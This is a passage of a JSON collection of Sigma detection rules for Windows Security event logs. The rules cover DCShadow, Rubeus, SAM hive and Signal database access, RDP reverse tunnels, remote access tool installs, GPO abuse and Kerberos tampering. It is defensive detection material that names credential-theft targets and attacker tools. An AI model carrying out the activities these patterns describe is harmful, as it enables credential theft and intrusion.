    "content": "title: Possible DC Shadow Attack\nid: 32e19d25-4aed-4860-a55a-be99cb0bf7ed\nrelated:\n    - id: 611eab06-a145-4dfa-a295-3ccc5c20f59a\n      type: derived\nstatus: test\ndescription: Detects DCShadow via create new SPN\nreferences:\n    - https://twitter.com/gentilkiwi/status/1003236624925413376\n    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\n    - https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48\nauthor: Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah\ndate: 2019-10-25\nmodified: 2022-10-17\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1207\nlogsource:\n    product: windows\n    service: security\n    definition: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following event IDs - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule needs to be set up (See https://github.com/OTRF/Set-AuditRule)\ndetection:\n    selection1:\n        EventID: 4742\n        ServicePrincipalNames|contains: 'GC/'\n    selection2:\n        EventID: 5136\n        AttributeLDAPDisplayName: servicePrincipalName\n        AttributeValue|startswith: 'GC/'\n    condition: 1 of selection*\nfalsepositives:\n    - Valid on domain controllers; exclude known DCs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml",
    "content": "title: PowerShell Scripts Installed as Services - Security\nid: 2a926e6a-4b81-4011-8a96-e36cc8c04302\nrelated:\n    - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae\n      type: derived\nstatus: test\ndescription: Detects powershell script installed as a Service\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2022-11-29\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_protected_storage_service_access.yml",
    "content": "title: Protected Storage Service Access\nid: 45545954-4016-43c6-855e-eae8f1c369dc\nstatus: test\ndescription: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2021-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName|contains: 'IPC'\n        RelativeTargetName: 'protected_storage'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml",
    "content": "title: RDP over Reverse SSH Tunnel WFP\nid: 5bed80b6-b3e8-428e-a3ae-d3c757589e41\nstatus: test\ndescription: Detects svchost hosting RDP termsvcs communicating with the loopback address\nreferences:\n    - https://twitter.com/SBousseaden/status/1096148422984384514\n    - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx\nauthor: Samir Bousseaden\ndate: 2019-02-16\nmodified: 2022-09-02\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1090.001\n    - attack.t1090.002\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5156\n    sourceRDP:\n        SourcePort: 3389\n        DestAddress:\n            - '127.*'\n            - '::1'\n    destinationRDP:\n        DestPort: 3389\n        SourceAddress:\n            - '127.*'\n            - '::1'\n    filter_app_container:\n        FilterOrigin: 'AppContainer Loopback'\n    filter_thor:  # checking BlueKeep vulnerability\n        Application|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    condition: selection and ( sourceRDP or destinationRDP ) and not 1 of filter*\nfalsepositives:\n    - Programs that connect locally to the RDP port\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml",
    "content": "title: Register new Logon Process by Rubeus\nid: 12e6d621-194f-4f59-90cc-1959e21e69f7\nstatus: test\ndescription: Detects potential use of Rubeus via registered new trusted logon process\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\nauthor: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community\ndate: 2019-10-24\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4611\n        LogonProcessName: 'User32LogonProcesss'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml",
    "content": "title: Service Registry Key Read Access Request\nid: 11d00fff-5dc3-428c-8184-801f292faec0\nstatus: test\ndescription: |\n    Detects \"read access\" requests on the services registry key.\n    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\n    Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.\nreferences:\n    - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\nauthor: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team\ndate: 2023-09-28\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: SACLs must be enabled for \"READ_CONTROL\" on the registry keys used in this rule'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectName|contains|all:\n            - '\\SYSTEM\\'\n            - 'ControlSet\\Services\\'\n        AccessList|contains: '%%1538' # READ_CONTROL\n    condition: selection\nfalsepositives:\n    - Likely from legitimate applications reading their key. Requires heavy tuning\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_remote_powershell_session.yml",
    "content": "title: Remote PowerShell Sessions Network Connections (WinRM)\nid: 13acf386-b8c6-4fe0-9a6e-c4756b974698\nstatus: test\ndescription: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5156\n        DestPort:\n            - 5985\n            - 5986\n        LayerRTID: 44\n    condition: selection\nfalsepositives:\n    - Legitimate use of remote PowerShell execution\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_replay_attack_detected.yml",
    "content": "title: Replay Attack Detected\nid: 5a44727c-3b85-4713-8c44-4401d5499629\nstatus: test\ndescription: Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.credential-access\n    - attack.t1558\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID: 4649\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml",
    "content": "title: SAM Registry Hive Handle Request\nid: f8748f2c-89dc-4d95-afb0-5a2dfdbad332\nstatus: test\ndescription: Detects handles requested to the SAM registry hive\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-12\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1012\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4656\n        ObjectType: 'Key'\n        ObjectName|endswith: '\\SAM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_scm_database_handle_failure.yml",
    "content": "title: SCM Database Handle Failure\nid: 13addce7-47b2-4ca0-a98f-1de964d1d669\nstatus: test\ndescription: Detects non-system users failing to obtain a handle to the SCM database.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-12\nmodified: 2022-07-11\ntags:\n    - attack.discovery\n    - attack.t1010\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4656\n        ObjectType: 'SC_MANAGER OBJECT'\n        ObjectName: 'ServicesActive'\n        AccessMask: '0xf003f'  # is used in the reference; otherwise too many FPs\n        # Keywords: 'Audit Failure' <-> in the ref 'Keywords':-9214364837600034816\n    filter:\n        SubjectLogonId: '0x3e4'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\n# triggering on many hosts in some environments\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml",
    "content": "title: SCM Database Privileged Operation\nid: dae8171c-5ec6-4396-b210-8466585b53e9\nstatus: test\ndescription: Detects non-system users performing a privileged operation on the SCM database\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton\ndate: 2019-08-15\nmodified: 2022-09-18\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4674\n        ObjectType: 'SC_MANAGER OBJECT'\n        ObjectName: 'servicesactive'\n        PrivilegeList: 'SeTakeOwnershipPrivilege'\n    filter:\n        SubjectLogonId: '0x3e4'\n        ProcessName|endswith: ':\\Windows\\System32\\services.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_sdelete_potential_secure_deletion.yml",
    "content": "title: Potential Secure Deletion with SDelete\nid: 39a80702-d7ca-4a83-b776-525b1f86a36d\nstatus: test\ndescription: Detects files that have extensions commonly seen while SDelete is used to wipe files.\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete\nauthor: Thomas Patzke\ndate: 2017-06-14\nmodified: 2024-12-13\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1070.004\n    - attack.t1027.005\n    - attack.t1485\n    - attack.t1553.002\n    - attack.s0195\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n            - 4658\n        ObjectName|endswith:\n            - '.AAA'\n            - '.ZZZ'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of SDelete\n    - Files that are interacted with that have these extensions legitimately\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_service_install_remote_access_software.yml",
    "content": "title: Remote Access Tool Services Have Been Installed - Security\nid: c8b00925-926c-47e3-beea-298fd563728e\nrelated:\n    - id: 1a31b18a-f00c-4061-9900-f735b96c99fc\n      type: similar\nstatus: test\ndescription: Detects the service installation of various remote access tool software. Such software is often abused by threat actors to perform\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Connor Martin, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-23\nmodified: 2024-12-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceName|contains:\n            # Based on https://github.com/SigmaHQ/sigma/pull/2841\n            - 'AmmyyAdmin' # https://www.ammyy.com/en/\n            - 'AnyDesk' # https://usersince99.medium.com/windows-privilege-escalation-8214ceaf4db8\n            - 'Atera'\n            - 'BASupportExpressSrvcUpdater' # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html\n            - 'BASupportExpressStandaloneService' # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html\n            - 'chromoting'\n            - 'GoToAssist' # https://www.goto.com/it-management/resolve\n            - 'GoToMyPC' # https://get.gotomypc.com/\n            - 'jumpcloud'\n            - 'LMIGuardianSvc' # https://www.logmein.com/\n            - 'LogMeIn' # https://www.logmein.com/\n            - 'monblanking'\n            - 'Parsec'\n            - 'RManService' # https://www.systemlookup.com/O23/7855-rutserv_exe.html\n            - 'RPCPerformanceService' # https://www.remotepc.com/\n            - 'RPCService' # https://www.remotepc.com/\n            - 'SplashtopRemoteService' # https://www.splashtop.com/\n            - 'SSUService'\n            - 'TeamViewer'\n            - 'TightVNC' # https://www.tightvnc.com/\n            - 'vncserver'\n            - 'Zoho'\n    condition: selection\nfalsepositives:\n    - The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml",
    "content": "title: Service Installed By Unusual Client - Security\nid: c4e92a97-a9ff-4392-9d2d-7a4c642768ca\nrelated:\n    - id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5\n      type: similar\nstatus: test\ndescription: Detects a service installed by a client which has PID 0 or whose parent has PID 0\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html\n    - https://www.x86matthew.com/view_post?id=create_svc_rpc\n    - https://twitter.com/SBousseaden/status/1490608838701166596\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-15\nmodified: 2023-01-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    service: security\n    product: windows\n    definition: 'Requirements: The System Security Extension audit subcategory needs to be enabled to log the EID 4697'\ndetection:\n    selection_eid:\n        EventID: 4697\n    selection_pid:\n        - ClientProcessId: 0\n        - ParentProcessId: 0\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_signal_sensitive_config_access.yml",
    "content": "title: File Access Of Signal Desktop Sensitive Data\nid: 5d6c375a-18ae-4952-b4f6-8b803f6c8555\nstatus: experimental\ndescription: |\n    Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.\n    The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.\n    Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the user's credentials.\n    Currently the rule only covers the default Signal installation path in AppData\\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.\nreferences:\n    - https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/\n    - https://vmois.dev/query-signal-desktop-messages-sqlite/\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: System Access Control List (SACL) policy with attributes List folder/read data on Objects'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        ObjectName|contains: '\\AppData\\Roaming\\Signal\\'\n        ObjectName|endswith:\n            - '\\config.json'\n            - '\\db.sqlite'\n    filter_main_signal:\n        ProcessName|endswith:\n            - '\\signal-portable.exe'\n            - '\\signal.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely, but possible from AV or backup software accessing the files.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml",
    "content": "title: SMB Create Remote File Admin Share\nid: b210394c-ba12-4f89-9117-44a2464b9511\nstatus: test\ndescription: Detects non-system accounts accessing a file over SMB with a write (0x2) access mask via an administrative share (e.g. C$).\nreferences:\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml\n    - https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file\nauthor: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)\ndate: 2020-08-06\nmodified: 2025-10-17\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName|endswith: 'C$'\n        AccessMask: '0x2'\n    filter_main_subjectusername:\n        SubjectUserName|endswith: '$'\n    filter_optional_local_ip:\n        IpAddress: '::1'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_add_domain_trust.yml",
    "content": "title: A New Trust Was Created To A Domain\nid: 0255a820-e564-4e40-af2b-6ac61160335c\nstatus: stable\ndescription: Detects the creation of a new trust to a domain (Event ID 4706). Adding domain trusts is rare and should be verified for legitimacy.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706\nauthor: Thomas Patzke\ndate: 2019-12-03\nmodified: 2024-01-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4706\n    condition: selection\nfalsepositives:\n    - Legitimate extension of domain structure\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_add_sid_history.yml",
    "content": "title: Addition of SID History to Active Directory Object\nid: 2632954e-db1c-49cb-9936-67d1ef1d17d2\nstatus: stable\ndescription: An attacker can use the SID history attribute to gain additional privileges.\nreferences:\n    - https://adsecurity.org/?p=1772\nauthor: Thomas Patzke, @atc_project (improvements)\ndate: 2017-02-19\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1134.005\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID:\n            - 4765\n            - 4766\n    selection2:\n        EventID: 4738\n    selection3:\n        SidHistory:\n            - '-'\n            - '%%1793'\n    filter_null:\n        SidHistory:\n    condition: selection1 or (selection2 and not selection3 and not filter_null)\nfalsepositives:\n    - Migration of an account into a new domain\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_computer_name.yml",
    "content": "title: Win Susp Computer Name Containing Samtheadmin\nid: 39698b3f-da92-4bc6-bfb5-645a98386e45\nstatus: test\ndescription: Detects the suspicious computer name samtheadmin-{1..100}$ generated by the sam-the-admin hacktool (CVE-2021-42278 / CVE-2021-42287 exploitation)\nreferences:\n    - https://twitter.com/malmoeb/status/1511760068743766026\n    - https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py\nauthor: elhoim\ndate: 2022-09-09\nmodified: 2023-01-04\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - cve.2021-42278\n    - cve.2021-42287\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    service: security\n    product: windows\ndetection:\n    # Not adding an EventID on purpose to try to match on any event in security (including use of account), not just 4741 (computer account created)\n    selection1:\n        SamAccountName|startswith: 'SAMTHEADMIN-'\n        SamAccountName|endswith: '$'\n    selection2:\n        TargetUserName|startswith: 'SAMTHEADMIN-'\n        TargetUserName|endswith: '$'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml",
    "content": "title: Password Change on Directory Service Restore Mode (DSRM) Account\nid: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51\nrelated:\n    - id: b61e87c0-50db-4b2e-8986-6a2be94b33b0\n      type: similar\nstatus: stable\ndescription: |\n    Detects potential attempts made to set the Directory Services Restore Mode administrator password.\n    The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.\n    Attackers may change the password in order to obtain persistence.\nreferences:\n    - https://adsecurity.org/?p=1714\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794\nauthor: Thomas Patzke\ndate: 2017-02-19\nmodified: 2020-08-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4794\n    condition: selection\nfalsepositives:\n    - Initial installation of a domain controller.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml",
    "content": "title: Account Tampering - Suspicious Failed Logon Reasons\nid: 9eb99343-d336-4020-a3cd-67f3819e68ee\nstatus: test\ndescription: This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625\n    - https://twitter.com/SBousseaden/status/1101431884540710913\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-19\nmodified: 2025-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID:\n            - 4625\n            - 4776\n    selection_status:\n        - Status:\n              - '0xC0000072'  # User logon to account disabled by administrator\n              - '0xC000006F'  # User logon outside authorized hours\n              - '0xC0000070'  # User logon from unauthorized workstation\n              - '0xC0000413'  # Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine\n              - '0xC000018C'  # The logon request failed because the trust relationship between the primary domain and the trusted domain failed\n              - '0xC000015B'  # The user has not been granted the requested logon type (aka logon right) at this machine\n        - SubStatus:\n              - '0xC0000072'  # User logon to account disabled by administrator\n              - '0xC000006F'  # User logon outside authorized hours\n              - '0xC0000070'  # User logon from unauthorized workstation\n              - '0xC0000413'  # Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine\n              - '0xC000018C'  # The logon request failed because the trust relationship between the primary domain and the trusted domain failed\n              - '0xC000015B'  # The user has not been granted the requested logon type (aka logon right) at this machine\n    filter:\n        SubjectUserSid: 'S-1-0-0'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - User using a disabled account\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_group_policy_abuse_privilege_addition.yml",
    "content": "title: Group Policy Abuse for Privilege Addition\nid: 1c480e10-7ee1-46d4-8ed2-85f9789e3ce4\nstatus: test\ndescription: |\n    Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.\nauthor: Elastic, Josh Nickels, Marius Rothenbücher\nreferences:\n    - https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275\ndate: 2024-09-04\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events.'\ndetection:\n    selection:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'gPCMachineExtensionNames'\n        AttributeValue|contains:\n            - '827D319E-6EAC-11D2-A4EA-00C04F79F83A'\n            - '803E14A0-B4FB-11D0-A0D0-00A0C90F574B'\n    condition: selection\nfalsepositives:\n    - Users allowed to perform these modifications (user found in field SubjectUserName)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_group_policy_startup_script_added_to_gpo.yml",
    "content": "title: Startup/Logon Script Added to Group Policy Object\nid: 123e4e6d-b123-48f8-b261-7214938acaf0\nstatus: test\ndescription: |\n    Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html\nauthor: Elastic, Josh Nickels, Marius Rothenbücher\ndate: 2024-09-06\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\n    - attack.t1547\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection_eventid:\n        EventID:\n            - 5136\n            - 5145\n    selection_attributes_main:\n        AttributeLDAPDisplayName:\n            - 'gPCMachineExtensionNames'\n            - 'gPCUserExtensionNames'\n        AttributeValue|contains: '42B5FAAE-6536-11D2-AE5A-0000F87571E3'\n    selection_attributes_optional:\n        AttributeValue|contains:\n            - '40B6664F-4972-11D1-A7CA-0000F87571E3'\n            - '40B66650-4972-11D1-A7CA-0000F87571E3'\n    selection_share:\n        ShareName|endswith: '\\SYSVOL'\n        RelativeTargetName|endswith:\n            - '\\scripts.ini'\n            - '\\psscripts.ini'\n        AccessList|contains: '%%4417'\n    condition: selection_eventid and (all of selection_attributes_* or selection_share)\nfalsepositives:\n    - Legitimate execution by system administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml",
    "content": "title: Kerberos Manipulation\nid: f7644214-0eb0-4ace-9455-331ec4c09253\nstatus: test\ndescription: Detects failed Kerberos ticket operations (TGT and service ticket requests, pre-authentication) with uncommon result codes. This can be a sign of manipulation of Kerberos messages by an attacker.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-10\nmodified: 2024-01-16\ntags:\n    - attack.credential-access\n    - attack.t1212\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 675\n            - 4768\n            - 4769\n            - 4771\n        Status:\n            - '0x9'\n            - '0xA'\n            - '0xB'\n            - '0xF'\n            - '0x10'\n            - '0x11'\n            - '0x13'\n            - '0x14'\n            - '0x1A'\n            - '0x1F'\n            - '0x21'\n            - '0x22'\n            - '0x23'\n            - '0x24'\n            - '0x26'\n            - '0x27'\n            - '0x28'\n            - '0x29'\n            - '0x2C'\n            - '0x2D'\n            - '0x2E'\n            - '0x2F'\n            - '0x31'\n            - '0x32'\n            - '0x3E'\n            - '0x3F'\n            - '0x40'\n            - '0x41'\n            - '0x43'\n            - '0x44'\n    condition: selection\nfalsepositives:\n    - Faulty legacy applications\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml",
    "content": "title: Suspicious LDAP-Attributes Used\nid: d00a9a72-2c09-4459-ad03-5e0a23351e36\nstatus: test\ndescription: Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.\nreferences:\n    - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961\n    - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/\n    - https://github.com/fox-it/LDAPFragger\nauthor: xknow @xknow_infosec\ndate: 2019-03-24\nmodified: 2022-10-05\ntags:\n    - attack.t1001.003\n    - attack.command-and-control\nlogsource:\n    product: windows\n    service: security\n    definition: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following event IDs - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule needs to be set up (See https://github.com/OTRF/Set-AuditRule)\ndetection:\n    selection:\n        EventID: 5136\n        AttributeValue|contains: '*'\n        AttributeLDAPDisplayName:\n            - 'primaryInternationalISDNNumber'\n            - 'otherFacsimileTelephoneNumber'\n            - 'primaryTelexNumber'\n    condition: selection\nfalsepositives:\n    - Companies, who may use these default LDAP-Attributes for personal information\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml",
